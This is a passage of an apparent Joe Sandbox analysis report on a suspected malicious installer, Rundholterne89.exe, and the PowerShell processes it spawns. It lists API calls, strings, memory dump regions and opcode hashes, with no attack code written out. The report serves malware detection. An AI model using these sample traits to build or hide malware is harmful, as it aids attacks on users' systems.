                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,774D3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                            • lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,774D3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                                                            • GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,774D3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 3248276644-2145255484
                                                                                            • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                            • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                                                            • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                            • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(?,774D3410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040363B
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Free$GlobalLibrary
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 1100898210-2145255484
                                                                                            • Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                            • Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
                                                                                            • Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                            • Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Rundholterne89.exe,C:\Users\user\Desktop\Rundholterne89.exe,80000000,00000003), ref: 004057EE
                                                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Rundholterne89.exe,C:\Users\user\Desktop\Rundholterne89.exe,80000000,00000003), ref: 004057FC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrlen
                                                                                            • String ID: C:\Users\user\Desktop
                                                                                            • API String ID: 2709904686-3080008178
                                                                                            • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                            • Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
                                                                                            • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                            • Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                                                            • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 190613189-0
                                                                                            • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                            • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                                                            • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                            • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm
                                                                                            • API String ID: 0-4263619562
                                                                                            • Opcode ID: f04001f6e1c3f9408cc49974d4087163e9694523ce91009cd67932b11b05cbcb
                                                                                            • Instruction ID: 0d84680ab1319549964a893c0847c7aeee240da04dfb03b223852008f6d09330
                                                                                            • Opcode Fuzzy Hash: f04001f6e1c3f9408cc49974d4087163e9694523ce91009cd67932b11b05cbcb
                                                                                            • Instruction Fuzzy Hash: EE038274E01219CFF764CB54C950BAABBB2BF85310F1084A9D91A6B391CB72ED81CF91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ebe224704c2a66bb7ca3534381884ed902dba47612720d5854ff9cfdb353d937
                                                                                            • Instruction ID: e6ac4a5db8ac96c9c2271c6a4c7d620435491edf778ee1658b1ea05110b6829e
                                                                                            • Opcode Fuzzy Hash: ebe224704c2a66bb7ca3534381884ed902dba47612720d5854ff9cfdb353d937
                                                                                            • Instruction Fuzzy Hash: D5529D75B00B19CFDB25CF64E855BADBBB2BF84304F14859AD40AAB350EB34A985CF41
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm
                                                                                            • API String ID: 0-3978585136
                                                                                            • Opcode ID: 578ae4c5aadbf995f05fe132be1ee9acfc1d489c96f1ac3013c42d2c58ac86a2
                                                                                            • Instruction ID: 53cd54f6736ee7d0fee75fdb7d7cb668ebd1f821c9992b5c37f04941e26de309
                                                                                            • Opcode Fuzzy Hash: 578ae4c5aadbf995f05fe132be1ee9acfc1d489c96f1ac3013c42d2c58ac86a2
                                                                                            • Instruction Fuzzy Hash: 09C2A574E01318DFE764DB54C950BAABBB2BF85310F1084A9D51A6B391CB32ED82CF91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm
                                                                                            • API String ID: 0-3189741695
                                                                                            • Opcode ID: 77a0ab440e654a02827c33f82cba83e53234f42bb7276afd033140db15bda1a5
                                                                                            • Instruction ID: c6b01753d56d03fd9124682554366ba4b7758fe3785b4a1b2ceb76a1dce40cb8
                                                                                            • Opcode Fuzzy Hash: 77a0ab440e654a02827c33f82cba83e53234f42bb7276afd033140db15bda1a5
                                                                                            • Instruction Fuzzy Hash: CF826F34E00319CFE764DB54C950BAABBB2AB85310F1485ADD91A6B355CB31FD82CF91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm
                                                                                            • API String ID: 0-3050064299
                                                                                            • Opcode ID: 6a461212557abe04f24cca89062b3beb2f83a91ed7bdee2fb04fc81eecc5f517
                                                                                            • Instruction ID: 6669353ffe11eb9ebaa799fa03d9fd23daf7ee1f5766edb32bb7ef26973fcc5c
                                                                                            • Opcode Fuzzy Hash: 6a461212557abe04f24cca89062b3beb2f83a91ed7bdee2fb04fc81eecc5f517
                                                                                            • Instruction Fuzzy Hash: 93825E34E00219CFE764DB94C850BAABBB2BB85310F1485ADD51AAB355CB71ED82CF91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm
                                                                                            • API String ID: 0-4000324069
                                                                                            • Opcode ID: e41b3811c2a001086a6775a8d613e7abf4e10c611e93c57960b7cf2422d5bc36
                                                                                            • Instruction ID: cefcd546de8098173ee5a63400c99074f4388b302ed44a49e3ebb7e649ad7cb8
                                                                                            • Opcode Fuzzy Hash: e41b3811c2a001086a6775a8d613e7abf4e10c611e93c57960b7cf2422d5bc36
                                                                                            • Instruction Fuzzy Hash: 8E725E34E00219CFE764DB54C950BAABBB2BB85310F14C5ADD91A6B355CB31ED82CF91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm$(fm$(fm$(fm$(fm
                                                                                            • API String ID: 0-656800924
                                                                                            • Opcode ID: fa6ab8ac2511881803b95164bc2995a3646fb25a62dc44884fb8a33efebfb24b
                                                                                            • Instruction ID: 3d09e0644e559c57d2c7758c85e04bd97ebda1d95668a13643845702a135c8d7
                                                                                            • Opcode Fuzzy Hash: fa6ab8ac2511881803b95164bc2995a3646fb25a62dc44884fb8a33efebfb24b
                                                                                            • Instruction Fuzzy Hash: A6124BB0E0121ACFEBA4CB54C950BAAB7B2BF45310F1484E9D55AAB381DB71ED81CF51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm$(fm$(fm$(fm$(fm
                                                                                            • API String ID: 0-656800924
                                                                                            • Opcode ID: 44ec02de40ab00b83ffa570c62ca0020df83a526730e2fda8e7a5b8710d93770
                                                                                            • Instruction ID: ea668cc30a2f81cb919f002613e6257c2a4cc7b215dcde7253effdb703f13aed
                                                                                            • Opcode Fuzzy Hash: 44ec02de40ab00b83ffa570c62ca0020df83a526730e2fda8e7a5b8710d93770
                                                                                            • Instruction Fuzzy Hash: 1F124BB0E0121ACFEBA4CB54C940BAAB7B2BF45310F1084E9D55AAB391DB71ED81CF51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm$(fm
                                                                                            • API String ID: 0-231707147
                                                                                            • Opcode ID: ca24936a4a3ec81d14384bcb0338615dbb8cc07e77ab2b9a0468a73380b98082
                                                                                            • Instruction ID: e0cf945be6b17b8f871d42a2eb11ec577c80e018b5940339491c86d52d0c2a03
                                                                                            • Opcode Fuzzy Hash: ca24936a4a3ec81d14384bcb0338615dbb8cc07e77ab2b9a0468a73380b98082
                                                                                            • Instruction Fuzzy Hash: 3FB2A535B01349DFEB54CB94C454BA9BBB2BB89314F2580ADD505AF392CB72EC42CB91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886502430.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm$(fm
                                                                                            • API String ID: 0-231707147
                                                                                            • Opcode ID: f82e82dc86ec01b13cc8fe1226bfe67230d803a1ab5477f558dbb3a6804aad90
                                                                                            • Instruction ID: 82b94002cdf45b8f1b4983fe4a22238bdb8a4f5cbbb1e0ddc05e6cda959c6638
                                                                                            • Opcode Fuzzy Hash: f82e82dc86ec01b13cc8fe1226bfe67230d803a1ab5477f558dbb3a6804aad90
                                                                                            • Instruction Fuzzy Hash: 6432C635B00204DFEB24CB64C455BAABBF2AF8D612F5580AAE4169F356DB31DC41CBB1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm$(fm
                                                                                            • API String ID: 0-231707147
                                                                                            • Opcode ID: 58f6b2036fbd0b53ff5671442e834277e436d30e6a4b22dbdd3f6eb403103fe6
                                                                                            • Instruction ID: f41de683e56124efb7a3827e19eda7b52719f1d07454e06de9c47866ac2b23e6
                                                                                            • Opcode Fuzzy Hash: 58f6b2036fbd0b53ff5671442e834277e436d30e6a4b22dbdd3f6eb403103fe6
                                                                                            • Instruction Fuzzy Hash: CBE19134F00209DFEB54DBA4C464BAEBBF2AF89310F258069D5056F396CB75EC428B95
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm
                                                                                            • API String ID: 0-3245611568
                                                                                            • Opcode ID: 85e36da75f6dc05874b0e30d26d9c202a3c852a1071ce3269b753d0a4f2ac8e4
                                                                                            • Instruction ID: c1b39ec1193d2b774725ea24fe2240e68ce08ed329ecfd1ada31bb1b523ac179
                                                                                            • Opcode Fuzzy Hash: 85e36da75f6dc05874b0e30d26d9c202a3c852a1071ce3269b753d0a4f2ac8e4
                                                                                            • Instruction Fuzzy Hash: 8B227F74A00345DFEB54CB94C454BA9BBB2BB89314F25C0ADE9199F352CB72EC42CB91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886502430.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm
                                                                                            • API String ID: 0-3245611568
                                                                                            • Opcode ID: 7c4f7b07e1e9f98331ecc990eb5cf66a87456a20ee60c70c5156d5aa0f127fc6
                                                                                            • Instruction ID: f1f78d720354826f5d41ffaa4765c00a7af4a80826653d05f5f7404f95d14765
                                                                                            • Opcode Fuzzy Hash: 7c4f7b07e1e9f98331ecc990eb5cf66a87456a20ee60c70c5156d5aa0f127fc6
                                                                                            • Instruction Fuzzy Hash: 8B812E74A00204DFDB14CF54C595E9ABBB2EF8C316F558199E819AB365CB32EC81CBB1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5e3566a7807966384a2024a82239d4a7dd15236ffc63f453e2eea14550639a29
                                                                                            • Instruction ID: b8863fdc2ae29b0693225bfca150653d1364ecd4118fc472d670d491ca8bee30
                                                                                            • Opcode Fuzzy Hash: 5e3566a7807966384a2024a82239d4a7dd15236ffc63f453e2eea14550639a29
                                                                                            • Instruction Fuzzy Hash: 49726175A01344DFEB54CB94C450BA9BBB2BB49314F2580ADE9096F392CB72ED42CF91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ffff391a6197adfff014a578e07b022d10eea953135497794c5b388474f1a7b1
                                                                                            • Instruction ID: d46b3c5d9e3225740221d8607e33856c34e7efc104de2d475ac90591b300bb51
                                                                                            • Opcode Fuzzy Hash: ffff391a6197adfff014a578e07b022d10eea953135497794c5b388474f1a7b1
                                                                                            • Instruction Fuzzy Hash: 99123C31F0431A9FE7658B688800F6ABFA2AFC5220F14847ED546DF292DF71C841D7A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f4ef048b8afad607cb1ed5aa42d9536eec646e2150224fc9a86b9ea76898c15
                                                                                            • Instruction ID: 30c00d1a39451701e0692be476c2123d42f600d57f8ca6c532f8831ff465b02b
                                                                                            • Opcode Fuzzy Hash: 9f4ef048b8afad607cb1ed5aa42d9536eec646e2150224fc9a86b9ea76898c15
                                                                                            • Instruction Fuzzy Hash: 0E326274B012199FF754CB98C854F6ABBF2AF85714F1480A9E505AF392CB72EC42CB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886537386.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 43049cc204c09870bf3478e6018f55ffc03b2daa240ccf080c62e0deec24c2f9
                                                                                            • Instruction ID: bae5c49eedecfeeb11991d45b684c013eea401a9c888999da04ea321a70fbfac
                                                                                            • Opcode Fuzzy Hash: 43049cc204c09870bf3478e6018f55ffc03b2daa240ccf080c62e0deec24c2f9
                                                                                            • Instruction Fuzzy Hash: E4023074A00609DFDB15CF59D884A9DBBB2FF88310F248169E905AB366C771EC81CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 451d969ec53f9070a3f69658db1eb52980a99fdd302fa2dbd4d5bcc33013b2b9
                                                                                            • Instruction ID: 57e30763d28f5fe868fc4bf8ee37eb29e09ae65056bff10a13f2dd58c7ed2f7d
                                                                                            • Opcode Fuzzy Hash: 451d969ec53f9070a3f69658db1eb52980a99fdd302fa2dbd4d5bcc33013b2b9
                                                                                            • Instruction Fuzzy Hash: 77912D31B0031EAFEB659B69C44477ABBA5AFC4320F24846DD846EB392DB31DD41C7A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70f92749fa3d24fd044f5a9d09cea59665df282adeb8db909851e445d01f86fa
                                                                                            • Instruction ID: cd5e9b9aaf32ed40ff7fbd5441319219537ed0ec0512f1867d25d68263f90937
                                                                                            • Opcode Fuzzy Hash: 70f92749fa3d24fd044f5a9d09cea59665df282adeb8db909851e445d01f86fa
                                                                                            • Instruction Fuzzy Hash: 92A16E36A00208DFDB14DFA4E544AADBBB2FF84310F119559E806AF365DB74AD49CF80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cc83079725875d0f36357fbe7e75c96ad9b4a028529eaa06226e1bb982abca9c
                                                                                            • Instruction ID: d361cdc2c28d055591ab94bfe17409f511a8b8c14dbc20e55425616768354f2b
                                                                                            • Opcode Fuzzy Hash: cc83079725875d0f36357fbe7e75c96ad9b4a028529eaa06226e1bb982abca9c
